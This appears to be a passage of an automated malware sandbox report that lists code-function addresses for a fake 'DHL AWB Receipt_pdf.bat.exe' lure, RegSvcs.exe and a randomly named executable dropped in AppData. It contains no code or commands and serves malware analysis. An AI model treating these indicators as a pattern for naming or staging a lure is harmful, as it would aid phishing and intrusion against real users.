Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D3D70 NtOpenThread,	9_2_019D3D70

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C4968	0_2_016C4968
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C08D2	0_2_016C08D2
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C28A8	0_2_016C28A8
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016CAA44	0_2_016CAA44
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C3A82	0_2_016C3A82
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C1D4F	0_2_016C1D4F
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C303A	0_2_016C303A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C6440	0_2_016C6440
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C6450	0_2_016C6450
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C34E8	0_2_016C34E8
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C6748	0_2_016C6748
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C4870	0_2_016C4870
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C2810	0_2_016C2810
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C58A0	0_2_016C58A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C5890	0_2_016C5890
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C6B08	0_2_016C6B08
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C6B18	0_2_016C6B18
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C6D40	0_2_016C6D40
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C6D50	0_2_016C6D50
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C6FE0	0_2_016C6FE0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C6FD0	0_2_016C6FD0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_016C4E01	0_2_016C4E01
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA2AA8	0_2_08CA2AA8
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA5A25	0_2_08CA5A25
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA6FA0	0_2_08CA6FA0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA1207	0_2_08CA1207
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CAA350	0_2_08CAA350
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA05F0	0_2_08CA05F0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA6550	0_2_08CA6550
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA19D1	0_2_08CA19D1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA1A30	0_2_08CA1A30
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA0040	0_2_08CA0040
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA0013	0_2_08CA0013
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CAC2A8	0_2_08CAC2A8
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CAA348	0_2_08CAA348
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA05E0	0_2_08CA05E0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA16CF	0_2_08CA16CF
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA1700	0_2_08CA1700
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A221858	0_2_0A221858
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A221849	0_2_0A221849
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A248C50	0_2_0A248C50
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A247540	0_2_0A247540
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A2412A0	0_2_0A2412A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A249CF0	0_2_0A249CF0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A5379C0	0_2_0A5379C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A532A68	0_2_0A532A68
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A532630	0_2_0A532630
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A532628	0_2_0A532628
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A539C50	0_2_0A539C50
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A530040	0_2_0A530040
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A530478	0_2_0A530478
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A5320D0	0_2_0A5320D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418823	9_2_00418823
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041009A	9_2_0041009A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004100A3	9_2_004100A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00416A1E	9_2_00416A1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00416A23	9_2_00416A23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004102C3	9_2_004102C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E299	9_2_0040E299
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E2A3	9_2_0040E2A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E3F2	9_2_0040E3F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E3F3	9_2_0040E3F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00401B83	9_2_00401B83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00401B90	9_2_00401B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E43C	9_2_0040E43C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0042ED43	9_2_0042ED43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E606	9_2_0040E606
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004026E0	9_2_004026E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402FD5	9_2_00402FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402FE0	9_2_00402FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A541A2	9_2_01A541A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A601AA	9_2_01A601AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A581CC	9_2_01A581CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990100	9_2_01990100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3A118	9_2_01A3A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A28158	9_2_01A28158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A32000	9_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A603E6	9_2_01A603E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AE3F0	9_2_019AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5A352	9_2_01A5A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A202C0	9_2_01A202C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A60591	9_2_01A60591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0535	9_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A4E4F6	9_2_01A4E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A44420	9_2_01A44420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A52446	9_2_01A52446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199C7C0	9_2_0199C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C4750	9_2_019C4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BC6E0	9_2_019BC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A6A9A6	9_2_01A6A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B6962	9_2_019B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019868B8	9_2_019868B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE8F0	9_2_019CE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A2840	9_2_019A2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AA840	9_2_019AA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A56BD7	9_2_01A56BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5AB40	9_2_01A5AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199EA80	9_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B8DBF	9_2_019B8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199ADE0	9_2_0199ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AAD00	9_2_019AAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3CD1F	9_2_01A3CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40CB5	9_2_01A40CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990CF2	9_2_01990CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0C00	9_2_019A0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1EFA0	9_2_01A1EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992FC8	9_2_01992FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019ACFE0	9_2_019ACFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A42F30	9_2_01A42F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0F30	9_2_019C0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E2F28	9_2_019E2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A14F40	9_2_01A14F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2E90	9_2_019B2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5CE93	9_2_01A5CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5EEDB	9_2_01A5EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5EE26	9_2_01A5EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0E59	9_2_019A0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AB1B0	9_2_019AB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A6B16B	9_2_01A6B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198F172	9_2_0198F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D516C	9_2_019D516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5F0E0	9_2_01A5F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A570E9	9_2_01A570E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A70C0	9_2_019A70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A4F0CC	9_2_01A4F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E739A	9_2_019E739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5132D	9_2_01A5132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198D34C	9_2_0198D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A52A0	9_2_019A52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A412ED	9_2_01A412ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BB2C0	9_2_019BB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3D5B0	9_2_01A3D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A695C3	9_2_01A695C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A57571	9_2_01A57571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5F43F	9_2_01A5F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01991460	9_2_01991460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5F7B0	9_2_01A5F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A516CC	9_2_01A516CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E5630	9_2_019E5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A35910	9_2_01A35910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A9950	9_2_019A9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BB950	9_2_019BB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A38E0	9_2_019A38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0D800	9_2_01A0D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BFB80	9_2_019BFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A15BF0	9_2_01A15BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DDBF9	9_2_019DDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5FB76	9_2_01A5FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A41AA3	9_2_01A41AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3DAAC	9_2_01A3DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E5AA0	9_2_019E5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A4DAC6	9_2_01A4DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A13A6C	9_2_01A13A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A57A46	9_2_01A57A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5FA49	9_2_01A5FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BFDC0	9_2_019BFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A57D73	9_2_01A57D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A3D40	9_2_019A3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A51D5A	9_2_01A51D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5FCF2	9_2_01A5FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A19C32	9_2_01A19C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A1F92	9_2_019A1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5FFB1	9_2_01A5FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01963FD5	9_2_01963FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01963FD2	9_2_01963FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5FF09	9_2_01A5FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A9EB0	9_2_019A9EB0
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01814968	10_2_01814968
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_018128A8	10_2_018128A8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_018108D3	10_2_018108D3
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01813A83	10_2_01813A83
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0181AA44	10_2_0181AA44
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01811D4F	10_2_01811D4F
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0181303B	10_2_0181303B
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_018134E8	10_2_018134E8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01816440	10_2_01816440
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01816450	10_2_01816450
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01816748	10_2_01816748
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0181490D	10_2_0181490D
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01815890	10_2_01815890
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_018158A0	10_2_018158A0
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0181281F	10_2_0181281F
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01814870	10_2_01814870
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01816B08	10_2_01816B08
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01816B18	10_2_01816B18
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01816D40	10_2_01816D40
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01816D50	10_2_01816D50
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01816FD0	10_2_01816FD0
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01816FE0	10_2_01816FE0
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_01814E01	10_2_01814E01
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_030D1858	10_2_030D1858
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_030D1849	10_2_030D1849
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_030F7540	10_2_030F7540
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_030F8C50	10_2_030F8C50
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_030F12A0	10_2_030F12A0
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_030F752A	10_2_030F752A
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_030F9CF0	10_2_030F9CF0
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_068E3E28	10_2_068E3E28
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_068E2628	10_2_068E2628
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_068E2630	10_2_068E2630
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_068E2A68	10_2_068E2A68
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_068E20D0	10_2_068E20D0
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_068E8042	10_2_068E8042
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_068E0040	10_2_068E0040
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_068E0478	10_2_068E0478
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_089DEA58	10_2_089DEA58
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_089DEDE8	10_2_089DEDE8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_08B6CBB8	10_2_08B6CBB8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_08B640D8	10_2_08B640D8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_08B6D208	10_2_08B6D208
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_08B608A0	10_2_08B608A0
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_08B60819	10_2_08B60819
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_08B6CBA8	10_2_08B6CBA8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_08B640C8	10_2_08B640C8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5E2AA8	10_2_0A5E2AA8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5E3970	10_2_0A5E3970
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5E1207	10_2_0A5E1207
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5EA350	10_2_0A5EA350
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5E6550	10_2_0A5E6550
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5E05F0	10_2_0A5E05F0
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5E1A30	10_2_0A5E1A30
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5E19D1	10_2_0A5E19D1
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5EC2B8	10_2_0A5EC2B8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5E0040	10_2_0A5E0040
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5E0006	10_2_0A5E0006
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5E16CF	10_2_0A5E16CF
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5E1700	10_2_0A5E1700
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_0A5E05E0	10_2_0A5E05E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01740100	15_2_01740100
